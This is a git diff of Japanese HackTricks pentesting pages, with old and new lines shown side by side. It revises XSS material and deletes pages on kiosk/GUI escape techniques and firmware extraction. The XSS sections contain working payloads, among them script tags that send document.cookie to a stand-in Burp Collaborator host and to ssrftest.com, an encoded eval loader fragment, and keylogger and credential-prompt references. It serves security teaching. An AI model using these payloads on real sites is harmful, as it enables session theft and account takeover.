### Ruby-On-Rails バイパス
**RoR マスアサインメント** により、HTMLに引用符が挿入され、その後引用制限がバイパスされ、追加のフィールドonfocusがタグ内に追加されることがあります。\
**RoR マスアサインメント** により、HTMLに引用符が挿入され、その後引用制限がバイパスされ、タグ内に追加のフィールドonfocusを追加できます。\
フォームの例 ([from this report](https://hackerone.com/reports/709336))、ペイロードを送信すると:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
@ -829,7 +831,7 @@ document['default'+'View'][`\u0061lert`](3)
もしあなたが **302リダイレクトレスポンスにヘッダーを注入できる** ことがわかった場合、**ブラウザに任意のJavaScriptを実行させる**ことを試みることができます。これは **簡単ではありません**。現代のブラウザは、HTTPレスポンスステータスコードが302の場合、HTTPレスポンスボディを解釈しないため、単なるクロスサイトスクリプティングペイロードは無意味です。
[**このレポート**](https://www.gremwell.com/firefox-xss-302) と [**こちら**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) では、Locationヘッダー内でいくつかのプロトコルをテストし、それらのいずれかがブラウザにボディ内のXSSペイロードを検査して実行させることを許可するかどうかを確認する方法を読むことができます。\
過去に知られているプロトコル: `mailto://`, `//x:1/`, `ws://`, `wss://`, _空のLocationヘッダー_, `resource://`.
過去の既知のプロトコル: `mailto://`, `//x:1/`, `ws://`, `wss://`, _空のLocationヘッダー_, `resource://`.
### Only Letters, Numbers and Dots
@ -837,7 +839,7 @@ document['default'+'View'][`\u0061lert`](3)
### Valid `<script>` Content-Types to XSS
[**こちらから**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/))もしあなたが **content-type** として `application/octet-stream` を持つスクリプトを読み込もうとすると、Chromeは次のエラーを投げます
[**こちらから**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/))もしあなたが `application/octet-stream` のような **content-type**スクリプトを読み込もうとすると、Chromeは次のエラーを投げます
> Refused to execute script from [https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') because its MIME type (application/octet-stream) is not executable, and strict MIME type checking is enabled.
@ -870,7 +872,7 @@ const char* const kSupportedJavascriptTypes[] = {
<script type="???"></script>
```
- **module** (デフォルト、説明は不要)
- [**webbundle**](https://web.dev/web-bundles/): Web Bundlesは、HTML、CSS、JSなどのデータをまとめて**`.wbn`**ファイルにパッケージ化できる機能です。
- [**webbundle**](https://web.dev/web-bundles/): Web Bundlesは、データHTML、CSS、JSなどをまとめて**`.wbn`**ファイルにパッケージ化できる機能です。
```html
<script type="webbundle">
{
@ -924,7 +926,7 @@ import { partition } from "lodash"
- application/xml
- text/xml
- image/svg+xml
- text/plain (?? リストにはありませんが、CTFで見たことがあると思います)
- text/plain (?? リストにはありませんが、CTFでこれを見たと思います)
- application/rss+xml (オフ)
- application/atom+xml (オフ)
@ -1266,8 +1268,8 @@ steal-info-js.md
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
> [!NOTE]
> あなたは**HTTPOnlyフラグがクッキーに設定されている場合、JavaScriptからクッキーにアクセスすることはできません**。しかし、運が良ければ、ここに[この保護を回避するいくつかの方法があります](../hacking-with-cookies/index.html#httponly)。
> [!TIP]
> あなたは**HTTPOnlyフラグがクッキーに設定されている場合、JavaScriptからクッキーにアクセスできません**。しかし、運が良ければ、ここに[この保護を回避するいくつかの方法があります](../hacking-with-cookies/index.html#httponly)。
### ページコンテンツを盗む
```javascript
@ -1358,9 +1360,9 @@ console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms")
};
}
```
_応答しているポートは短い時間を示します_ _応答がない場合は長い時間を示します。_
_短い時間は応答しているポートを示します_ _長い時間は応答がないことを示します。_
Chromeで禁止されているポートのリストを[**こちら**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc)で確認し、Firefoxでは[**こちら**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist)で確認してください。
Chromeで禁止されているポートのリストを[**こちら**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc)で、Firefoxでのリストを[**こちら**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist)で確認してください。
### 資格情報を要求するボックス
```html
@ -1381,12 +1383,12 @@ body:username.value+':'+this.value
### キーロガー
GitHubで検索したところ、いくつかの異なるものを見つけました:
GitHubでいくつかの異なるものを見つけました
- [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
- [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
- [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
- また、metasploit`http_javascript_keylogger`を使用することもできます。
- また、metasploit `http_javascript_keylogger` を使用することもできます。
### CSRFトークンの盗難
```javascript
@ -1496,7 +1498,7 @@ javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4Ln
<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}
```
### Regex - 隠れたコンテンツへのアクセス
### Regex - 隠れたコンテンツへのアクセス
From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:
```javascript
@ -1542,8 +1544,8 @@ xss-in-markdown.md
### 動的に作成されたPDFにおけるXSS
ウェブページがユーザー制御の入力を使用してPDFを作成している場合、PDFを作成しているボットを**だまして**、**任意のJSコードを実行**させることを試みることができます。\
したがって、**PDF作成ボットが**何らかの**HTML** **タグ**を見つけると、それを**解釈**し、あなたはこの動作を**悪用**して**サーバーXSS**を引き起こすことができます。
ウェブページがユーザー制御の入力を使用してPDFを作成している場合、PDFを作成しているボットを**だまして**、**任意のJSコードを実行**させることができます。\
したがって、**PDF作成ボットが**何らかの**HTML** **タグ**を見つけると、それを**解釈**し、この動作を**悪用**して**サーバーXSS**を引き起こすことができます。
{{#ref}}
server-side-xss-dynamic-pdf.md
@ -1557,13 +1559,13 @@ pdf-injection.md
### Amp4EmailにおけるXSS
AMPは、モバイルデバイスでのウェブページパフォーマンスを向上させることを目的としており、速度とセキュリティを重視してJavaScriptで機能を補完したHTMLタグを組み込んでいます。さまざまな機能のためのコンポーネントの範囲をサポートしており、[AMPコンポーネント](https://amp.dev/documentation/components/?format=websites)を介してアクセスできます。
AMPは、モバイルデバイスでのウェブページパフォーマンスを向上させることを目的としており、速度とセキュリティを重視してJavaScriptで補完されたHTMLタグを組み込んでいます。さまざまな機能のためのコンポーネントの範囲をサポートしており、[AMPコンポーネント](https://amp.dev/documentation/components/?format=websites)を介してアクセスできます。
[**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/)フォーマットは、特定のAMPコンポーネントをメールに拡張し、受信者がメール内で直接コンテンツと対話できるようにします。
例として[**GmailのAmp4EmailにおけるXSSの解説**](https://adico.me/post/xss-in-gmail-s-amp4email)。
例として、[**GmailのAmp4EmailにおけるXSSの書き込み**](https://adico.me/post/xss-in-gmail-s-amp4email)。
### ファイルのアップロードにおけるXSS (svg)
### ファイルのアップロードによるXSSsvg
次のようなファイルを画像としてアップロードします([http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)から):
```html

10
src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
View File

@ -1,14 +1,12 @@
# クライアントサイドJSのデバッグ
## クライアントサイドJSのデバッグ
{{#include ../../banners/hacktricks-training.md}}
クライアントサイドJSのデバッグは面倒です。なぜなら、URLを変更するたびに使用するパラメータやパラメータの値の変更を含む、**ブレークポイントをリセットしてページを再読み込みする必要があるからです**。
クライアントサイドJSのデバッグは面倒です。URLを変更するたびに使用するパラメータやパラメータの値の変更を含む、**ブレークポイントをリセットしてページを再読み込みする必要があります**。
### `debugger;`
JSファイル内に`debugger;`という行を置くと、**ブラウザ**がJSを実行する際にその場所で**デバッガ**が**停止**します。したがって、定常的なブレークポイントを設定する方法の一つは、**すべてのファイルをローカルにダウンロードし、JSコード内にブレークポイントを設定することです**
JSファイル内に`debugger;`という行を置くと、**ブラウザ**がJSを実行する際にその場所で**デバッガ**が**停止**します。したがって、定常的なブレークポイントを設定する方法の一つは、**すべてのファイルをローカルにダウンロードし、JSコード内にブレークポイントを設定すること**です。
### オーバーライド
@ -17,11 +15,11 @@ JSファイル内に`debugger;`という行を置くと、**ブラウザ**がJS
**オーバーライドを保存するために使用するローカルの空のフォルダーを作成する必要があります**。新しいローカルフォルダーを作成し、そのページでオーバーライドとして設定してください。
次に、「Dev Tools」 --> 「Sources」で**オーバーライドしたいファイルを選択し、右クリックして「Save for overrides」を選択します**
次に、「Dev Tools」 --> 「Sources」で**オーバーライドしたいファイルを選択し、右クリックして「Save for overrides」を選択**します。
![](<../../images/image (742).png>)
これにより、**JSファイルがローカルにコピーされ**、**ブラウザ内でそのコピーを変更できるようになります**。したがって、**`debugger;`**コマンドを好きな場所に追加し、**変更を保存**して**ページを再読み込み**すると、毎回そのウェブページにアクセスするたびに**ローカルのJSコピーが読み込まれ**、デバッガコマンドがその場所に持されます:
これにより、**JSファイルがローカルにコピーされ**、**ブラウザ内でそのコピーを修正できるようになります**。したがって、**`debugger;`**コマンドを好きな場所に追加し、**変更を保存**して**ページを再読み込み**すると、毎回そのウェブページにアクセスするたびに**ローカルのJSコピーが読み込まれ**、デバッガコマンドがその場所に持されます:
![](<../../images/image (594).png>)

276
src/physical-attacks/escaping-from-gui-applications/README.md
View File

@ -1,276 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# GUIアプリケーション内の可能なアクションを確認する
**一般的なダイアログ**は、**ファイルの保存**、**ファイルのオープン**、フォントや色の選択などのオプションです。これらのほとんどは**完全なエクスプローラー機能**を提供します。つまり、これらのオプションにアクセスできれば、エクスプローラーの機能にアクセスできるということです:
- 閉じる/名前を付けて閉じる
- 開く/他のアプリで開く
- 印刷
- エクスポート/インポート
- 検索
- スキャン
次のことができるか確認してください:
- 新しいファイルを修正または作成する
- シンボリックリンクを作成する
- 制限された領域にアクセスする
- 他のアプリを実行する
## コマンド実行
おそらく**`Open with`**オプションを使用することで、何らかのシェルを開く/実行することができます。
### Windows
例えば、_cmd.exe、command.com、Powershell/Powershell ISE、mmc.exe、at.exe、taskschd.msc..._ ここでコマンドを実行するために使用できるバイナリをさらに見つけてください:[https://lolbas-project.github.io/](https://lolbas-project.github.io)
### \*NIX \_\_
_bash、sh、zsh..._ さらにこちらを参照してください:[https://gtfobins.github.io/](https://gtfobins.github.io)
# Windows
## パス制限の回避
- **環境変数**:いくつかのパスを指している環境変数がたくさんあります
- **他のプロトコル**_about:、data:、ftp:、file:、mailto:、news:、res:、telnet:、view-source:_
- **シンボリックリンク**
- **ショートカット**CTRL+N新しいセッションを開く、CTRL+Rコマンドを実行、CTRL+SHIFT+ESCタスクマネージャー、Windows+Eエクスプローラーを開く、CTRL-B、CTRL-Iお気に入り、CTRL-H履歴、CTRL-L、CTRL-Oファイル/オープンダイアログ、CTRL-P印刷ダイアログ、CTRL-S名前を付けて保存
- 隠し管理メニューCTRL-ALT-F8、CTRL-ESC-F9
- **シェルURI**_shell:Administrative Tools、shell:DocumentsLibrary、shell:Librariesshell:UserProfiles、shell:Personal、shell:SearchHomeFolder、shell:Systemshell:NetworkPlacesFolder、shell:SendTo、shell:UsersProfiles、shell:Common Administrative Tools、shell:MyComputerFolder、shell:InternetFolder_
- **UNCパス**共有フォルダーに接続するためのパス。ローカルマシンのC$に接続を試みるべきです("\\\127.0.0.1\c$\Windows\System32"
- **その他のUNCパス**
| UNC | UNC | UNC |
| ------------------------- | -------------- | -------------------- |
| %ALLUSERSPROFILE% | %APPDATA% | %CommonProgramFiles% |
| %COMMONPROGRAMFILES(x86)% | %COMPUTERNAME% | %COMSPEC% |
| %HOMEDRIVE% | %HOMEPATH% | %LOCALAPPDATA% |
| %LOGONSERVER% | %PATH% | %PATHEXT% |
| %ProgramData% | %ProgramFiles% | %ProgramFiles(x86)% |
| %PROMPT% | %PSModulePath% | %Public% |
| %SYSTEMDRIVE% | %SYSTEMROOT% | %TEMP% |
| %TMP% | %USERDOMAIN% | %USERNAME% |
| %USERPROFILE% | %WINDIR% | |
## バイナリをダウンロードする
Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
レジストリエディタ: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
## ブラウザからファイルシステムにアクセスする
| PATH | PATH | PATH | PATH |
| ------------------- | ----------------- | ------------------ | ------------------- |
| File:/C:/windows | File:/C:/windows/ | File:/C:/windows\\ | File:/C:\windows |
| File:/C:\windows\\ | File:/C:\windows/ | File://C:/windows | File://C:/windows/ |
| File://C:/windows\\ | File://C:\windows | File://C:\windows/ | File://C:\windows\\ |
| C:/windows | C:/windows/ | C:/windows\\ | C:\windows |
| C:\windows\\ | C:\windows/ | %WINDIR% | %TMP% |
| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
| %HOMEDRIVE% | %HOMESHARE | | <p><br></p> |
## ショートカット
- スティッキーキー SHIFTを5回押す
- マウスキー SHIFT+ALT+NUMLOCK
- ハイコントラスト SHIFT+ALT+PRINTSCN
- トグルキー NUMLOCKを5秒間保持する
- フィルターキー 右SHIFTを12秒間保持する
- WINDOWS+F1 Windows検索
- WINDOWS+D デスクトップを表示
- WINDOWS+E Windowsエクスプローラーを起動
- WINDOWS+R 実行
- WINDOWS+U アクセシビリティセンター
- WINDOWS+F 検索
- SHIFT+F10 コンテキストメニュー
- CTRL+SHIFT+ESC タスクマネージャー
- CTRL+ALT+DEL 新しいWindowsバージョンでのスプラッシュスクリーン
- F1 ヘルプ F3 検索
- F6 アドレスバー
- F11 Internet Explorer内で全画面表示を切り替え
- CTRL+H Internet Explorerの履歴
- CTRL+T Internet Explorer 新しいタブ
- CTRL+N Internet Explorer 新しいページ
- CTRL+O ファイルを開く
- CTRL+S 保存 CTRL+N 新しいRDP / Citrix
## スワイプ
- 左側から右にスワイプしてすべてのオープンウィンドウを表示し、KIOSKアプリを最小化してOS全体に直接アクセスする
- 右側から左にスワイプしてアクションセンターを開き、KIOSKアプリを最小化してOS全体に直接アクセスする
- 上端からスワイプしてフルスクリーンモードで開いているアプリのタイトルバーを表示する;
- 下からスワイプしてフルスクリーンアプリでタスクバーを表示する。
## Internet Explorerのトリック
### '画像ツールバー'
画像をクリックすると左上に表示されるツールバーです。保存、印刷、メール送信、エクスプローラーで「マイピクチャ」を開くことができます。KioskはInternet Explorerを使用している必要があります。
### シェルプロトコル
エクスプローラー表示を取得するためにこのURLを入力します
- `shell:Administrative Tools`
- `shell:DocumentsLibrary`
- `shell:Libraries`
- `shell:UserProfiles`
- `shell:Personal`
- `shell:SearchHomeFolder`
- `shell:NetworkPlacesFolder`
- `shell:SendTo`
- `shell:UserProfiles`
- `shell:Common Administrative Tools`
- `shell:MyComputerFolder`
- `shell:InternetFolder`
- `Shell:Profile`
- `Shell:ProgramFiles`
- `Shell:System`
- `Shell:ControlPanelFolder`
- `Shell:Windows`
- `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> コントロールパネル
- `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> マイコンピュータ
- `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> マイネットワークプレイス
- `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
## ファイル拡張子を表示する
詳細についてはこのページを確認してください:[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
# ブラウザのトリック
バックアップiKatバージョン
[http://swin.es/k/](http://swin.es/k/)\
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
JavaScriptを使用して一般的なダイアログを作成し、ファイルエクスプローラーにアクセスします`document.write('<input/type=file>')`
出典https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
# iPad
## ジェスチャーとボタン
- 四本(または五本)の指で上にスワイプ / ホームボタンをダブルタップ:マルチタスクビューを表示し、アプリを変更する
- 四本または五本の指で一方の方向にスワイプ:次の/前のアプリに切り替える
- 五本の指で画面をピンチ / ホームボタンをタッチ / 画面の下から1本の指で素早く上にスワイプホームにアクセスする
- 画面の下から1本の指で1-2インチスワイプ遅くドックが表示される
- 画面の上部から1本の指でスワイプダウン通知を表示する
- 画面の右上隅から1本の指でスワイプダウンiPad Proのコントロールセンターを表示する
- 画面の左から1本の指で1-2インチスワイプ今日のビューを表示する
- 画面の中央から右または左に1本の指で素早くスワイプ次の/前のアプリに切り替える
- 上部右隅の**iPad +**の電源ボタンを押し続け、**電源オフ**スライダーを右にスライドさせる:電源を切る
- 上部右隅の**iPad**の電源ボタンとホームボタンを数秒間押す:強制的にハード電源オフする
- 上部右隅の**iPad**の電源ボタンとホームボタンを素早く押す:スクリーンショットを撮影し、表示の左下にポップアップします。両方のボタンを同時に非常に短時間押すと、数秒間保持するとハード電源オフが実行されます。
## ショートカット
iPadキーボードまたはUSBキーボードアダプタが必要です。アプリケーションからの脱出に役立つショートカットのみがここに表示されます。
| Key | Name |
| --- | ------------ |
| ⌘ | Command |
| ⌥ | Option (Alt) |
| ⇧ | Shift |
| ↩ | Return |
| ⇥ | Tab |
| ^ | Control |
| ← | Left Arrow |
| → | Right Arrow |
| ↑ | Up Arrow |
| ↓ | Down Arrow |
### システムショートカット
これらのショートカットは、iPadの使用に応じた視覚設定と音声設定のためのものです。
| Shortcut | Action |
| -------- | ------------------------------------------------------------------------------ |
| F1 | 画面を暗くする |
| F2 | 画面を明るくする |
| F7 | 1曲戻る |
| F8 | 再生/一時停止 |
| F9 | 曲をスキップ |
| F10 | ミュート |
| F11 | 音量を下げる |
| F12 | 音量を上げる |
| ⌘ Space | 利用可能な言語のリストを表示1つを選択するには、スペースバーを再度タップします。 |
### iPadナビゲーション
| Shortcut | Action |
| -------------------------------------------------- | ------------------------------------------------------- |
| ⌘H | ホームに移動 |
| ⌘⇧H (Command-Shift-H) | ホームに移動 |
| ⌘ (Space) | Spotlightを開く |
| ⌘⇥ (Command-Tab) | 最後に使用したアプリのリストを表示 |
| ⌘\~ | 最後のアプリに移動 |
| ⌘⇧3 (Command-Shift-3) | スクリーンショット(保存またはアクションを実行するために左下にホバー) |
| ⌘⇧4 | スクリーンショットを撮影し、エディタで開く |
| ⌘を押し続ける | アプリのための利用可能なショートカットのリストを表示 |
| ⌘⌥D (Command-Option/Alt-D) | ドックを表示 |
| ^⌥H (Control-Option-H) | ホームボタン |
| ^⌥H H (Control-Option-H-H) | マルチタスクバーを表示 |
| ^⌥I (Control-Option-i) | アイテム選択 |
| Escape | 戻るボタン |
| → (右矢印) | 次のアイテム |
| ← (左矢印) | 前のアイテム |
| ↑↓ (上矢印、下矢印) | 選択したアイテムを同時にタップ |
| ⌥ ↓ (Option-Down矢印) | 下にスクロール |
| ⌥↑ (Option-Up矢印) | 上にスクロール |
| ⌥←または⌥→ (Option-Left矢印またはOption-Right矢印) | 左または右にスクロール |
| ^⌥S (Control-Option-S) | VoiceOverの音声をオンまたはオフにする |
| ⌘⇧⇥ (Command-Shift-Tab) | 前のアプリに切り替える |
| ⌘⇥ (Command-Tab) | 元のアプリに戻る |
| ←+→、次にOption + ←またはOption+→ | ドックをナビゲート |
### Safariショートカット
| Shortcut | Action |
| ----------------------- | ------------------------------------------------ |
| ⌘L (Command-L) | ロケーションを開く |
| ⌘T | 新しいタブを開く |
| ⌘W | 現在のタブを閉じる |
| ⌘R | 現在のタブを更新する |
| ⌘. | 現在のタブの読み込みを停止する |
| ^⇥ | 次のタブに切り替える |
| ^⇧⇥ (Control-Shift-Tab) | 前のタブに移動 |
| ⌘L | テキスト入力/URLフィールドを選択して修正する |
| ⌘⇧T (Command-Shift-T) | 最後に閉じたタブを開く(何度でも使用可能) |
| ⌘\[ | ブラウジング履歴で1ページ戻る |
| ⌘] | ブラウジング履歴で1ページ進む |
| ⌘⇧R | リーダーモードを有効にする |
### メールショートカット
| Shortcut | Action |
| -------------------------- | ---------------------------- |
| ⌘L | ロケーションを開く |
| ⌘T | 新しいタブを開く |
| ⌘W | 現在のタブを閉じる |
| ⌘R | 現在のタブを更新する |
| ⌘. | 現在のタブの読み込みを停止する |
| ⌘⌥F (Command-Option/Alt-F) | メールボックス内を検索する |
# 参考文献
- [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
- [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
- [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
- [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
{{#include ../../banners/hacktricks-training.md}}

240
src/physical-attacks/firmware-analysis/README.md
View File

@ -1,240 +0,0 @@
# ファームウェア分析
{{#include ../../banners/hacktricks-training.md}}
## **はじめに**
ファームウェアは、デバイスが正しく動作するために必要なソフトウェアであり、ハードウェアコンポーネントとユーザーが対話するソフトウェア間の通信を管理し促進します。これは永続的なメモリに保存されており、デバイスが電源を入れた瞬間から重要な指示にアクセスできるようにし、オペレーティングシステムの起動につながります。ファームウェアを調査し、潜在的に変更することは、セキュリティの脆弱性を特定するための重要なステップです。
## **情報収集**
**情報収集**は、デバイスの構成や使用されている技術を理解するための重要な初期ステップです。このプロセスには、以下のデータを収集することが含まれます:
- CPUアーキテクチャと実行されているオペレーティングシステム
- ブートローダーの詳細
- ハードウェアのレイアウトとデータシート
- コードベースのメトリクスとソースの場所
- 外部ライブラリとライセンスの種類
- 更新履歴と規制認証
- アーキテクチャ図とフローダイアグラム
- セキュリティ評価と特定された脆弱性
この目的のために、**オープンソースインテリジェンスOSINT**ツールは非常に貴重であり、手動および自動レビュープロセスを通じて利用可能なオープンソースソフトウェアコンポーネントの分析も重要です。[Coverity Scan](https://scan.coverity.com)や[Semmles LGTM](https://lgtm.com/#explore)のようなツールは、潜在的な問題を見つけるために活用できる無料の静的分析を提供します。
## **ファームウェアの取得**
ファームウェアを取得する方法はいくつかあり、それぞれ異なる複雑さがあります:
- **直接**ソース(開発者、製造業者)から
- 提供された指示から**ビルド**する
- 公式サポートサイトから**ダウンロード**する
- ホストされたファームウェアファイルを見つけるために**Google dork**クエリを利用する
- [S3Scanner](https://github.com/sa7mon/S3Scanner)のようなツールを使って**クラウドストレージ**に直接アクセスする
- マンインザミドル技術を介して**更新**を傍受する
- **UART**、**JTAG**、または**PICit**のような接続を通じてデバイスから**抽出**する
- デバイス通信内での更新リクエストを**スニッフィング**する
- **ハードコーディングされた更新エンドポイント**を特定して使用する
- ブートローダーまたはネットワークから**ダンプ**する
- すべてが失敗した場合、適切なハードウェアツールを使用してストレージチップを**取り外して読み取る**
## ファームウェアの分析
今や**ファームウェアを持っている**ので、それについての情報を抽出してどのように扱うかを知る必要があります。それに使用できるさまざまなツール:
```bash
file <bin>
strings -n8 <bin>
strings -tx <bin> #print offsets in hex
hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head # might find signatures in header
fdisk -lu <bin> #lists a drives partition and filesystems if multiple
```
画像の**エントロピー**を`binwalk -E <bin>`で確認し、エントロピーが低ければ、暗号化されている可能性は低いです。エントロピーが高ければ、暗号化されている(または何らかの方法で圧縮されている)可能性があります。
さらに、これらのツールを使用して**ファームウェア内に埋め込まれたファイル**を抽出できます:
{{#ref}}
../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
{{#endref}}
または[**binvis.io**](https://binvis.io/#/)[code](https://code.google.com/archive/p/binvis/))を使用してファイルを検査します。
### ファイルシステムの取得
前述のツール`binwalk -ev <bin>`を使用して**ファイルシステムを抽出**できたはずです。\
Binwalkは通常、**ファイルシステムのタイプとして名前付けされたフォルダー**内に抽出します。通常、以下のいずれかですsquashfs、ubifs、romfs、rootfs、jffs2、yaffs2、cramfs、initramfs。
#### 手動ファイルシステム抽出
場合によっては、binwalkが**ファイルシステムのマジックバイトをシグネチャに持っていない**ことがあります。このような場合は、binwalkを使用して**ファイルシステムのオフセットを見つけ、バイナリから圧縮されたファイルシステムを切り出し、以下の手順に従って**ファイルシステムを手動で抽出します。
```
$ binwalk DIR850L_REVB.bin
DECIMAL HEXADECIMAL DESCRIPTION
----------------------------------------------------------------------------- ---
0 0x0 DLOB firmware header, boot partition: """"dev=/dev/mtdblock/1""""
10380 0x288C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5213748 bytes
1704052 0x1A0074 PackImg section delimiter tag, little endian size: 32256 bytes; big endian size: 8257536 bytes
1704084 0x1A0094 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8256900 bytes, 2688 inodes, blocksize: 131072 bytes, created: 2016-07-12 02:28:41
```
次の**ddコマンド**を実行してSquashfsファイルシステムを切り出します。
```
$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
8257536+0 records in
8257536+0 records out
8257536 bytes (8.3 MB, 7.9 MiB) copied, 12.5777 s, 657 kB/s
```
代わりに、次のコマンドも実行できます。
`$ dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs`
- squashfs上記の例で使用
`$ unsquashfs dir.squashfs`
ファイルはその後「`squashfs-root`」ディレクトリにあります。
- CPIOアーカイブファイル
`$ cpio -ivd --no-absolute-filenames -F <bin>`
- jffs2ファイルシステム用
`$ jefferson rootfsfile.jffs2`
- NANDフラッシュを使用したubifsファイルシステム用
`$ ubireader_extract_images -u UBI -s <start_offset> <bin>`
`$ ubidump.py <bin>`
## ファームウェアの分析
ファームウェアが取得されたら、その構造と潜在的な脆弱性を理解するために解剖することが重要です。このプロセスでは、さまざまなツールを利用してファームウェアイメージから貴重なデータを分析および抽出します。
### 初期分析ツール
バイナリファイル(`<bin>`と呼ばれる)の初期検査のためのコマンドセットが提供されています。これらのコマンドは、ファイルタイプの特定、文字列の抽出、バイナリデータの分析、パーティションおよびファイルシステムの詳細の理解に役立ちます:
```bash
file <bin>
strings -n8 <bin>
strings -tx <bin> #prints offsets in hexadecimal
hexdump -C -n 512 <bin> > hexdump.out
hexdump -C <bin> | head #useful for finding signatures in the header
fdisk -lu <bin> #lists partitions and filesystems, if there are multiple
```
画像の暗号化状態を評価するために、**エントロピー**は`binwalk -E <bin>`でチェックされます。低エントロピーは暗号化の欠如を示唆し、高エントロピーは暗号化または圧縮の可能性を示します。
**埋め込まれたファイル**を抽出するためには、**file-data-carving-recovery-tools**のドキュメントやファイル検査のための**binvis.io**などのツールとリソースが推奨されます。
### ファイルシステムの抽出
`binwalk -ev <bin>`を使用することで、通常はファイルシステムを抽出でき、しばしばファイルシステムタイプにちなんだ名前のディレクトリに抽出されますsquashfs、ubifs。ただし、**binwalk**がマジックバイトの欠如によりファイルシステムタイプを認識できない場合、手動抽出が必要です。これには、`binwalk`を使用してファイルシステムのオフセットを特定し、その後`dd`コマンドを使用してファイルシステムを切り出します。
```bash
$ binwalk DIR850L_REVB.bin
$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
```
その後、ファイルシステムのタイプsquashfs、cpio、jffs2、ubifsに応じて、異なるコマンドが使用されて手動で内容を抽出します。
### ファイルシステム分析
ファイルシステムが抽出されると、セキュリティの欠陥を探し始めます。注意が払われるのは、安全でないネットワークデーモン、ハードコーディングされた資格情報、APIエンドポイント、更新サーバー機能、未コンパイルのコード、スタートアップスクリプト、およびオフライン分析用のコンパイル済みバイナリです。
**確認すべき主要な場所**と**項目**には以下が含まれます:
- **etc/shadow****etc/passwd** のユーザー資格情報
- **etc/ssl** のSSL証明書とキー
- 潜在的な脆弱性のための設定ファイルとスクリプトファイル
- さらなる分析のための埋め込まれたバイナリ
- 一般的なIoTデバイスのウェブサーバーとバイナリ
いくつかのツールがファイルシステム内の機密情報や脆弱性を明らかにするのを助けます:
- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) と [**Firmwalker**](https://github.com/craigz28/firmwalker) の機密情報検索
- [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT_core) の包括的なファームウェア分析
- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer)、[**ByteSweep**](https://gitlab.com/bytesweep/bytesweep)、[**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go)、および [**EMBA**](https://github.com/e-m-b-a/emba) の静的および動的分析
### コンパイル済みバイナリのセキュリティチェック
ファイルシステム内で見つかったソースコードとコンパイル済みバイナリは、脆弱性のために精査されなければなりません。Unixバイナリ用の**checksec.sh**やWindowsバイナリ用の**PESecurity**のようなツールは、悪用される可能性のある保護されていないバイナリを特定するのに役立ちます。
## 動的分析のためのファームウェアのエミュレーション
